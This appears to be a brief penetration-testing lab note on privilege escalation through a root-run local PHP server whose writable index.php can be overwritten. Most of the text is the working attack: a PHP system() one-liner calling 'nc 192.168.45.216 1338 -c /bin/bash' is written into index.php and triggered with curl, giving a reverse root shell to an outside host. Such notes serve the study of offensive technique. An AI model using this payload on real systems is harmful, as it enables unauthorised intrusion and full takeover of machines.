Last updated 8 months ago
ps aux | grep root
/bin/sh -c /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
PHP web app being hosted locally on port 57 with the root directory of the web app being /var/tmp/sv/
echo "<?php system('nc 192.168.45.216 1338 -c /bin/bash');?>" > index.php curl http://127.0.0.1:57/index.php
Index.php owned by root writable for us
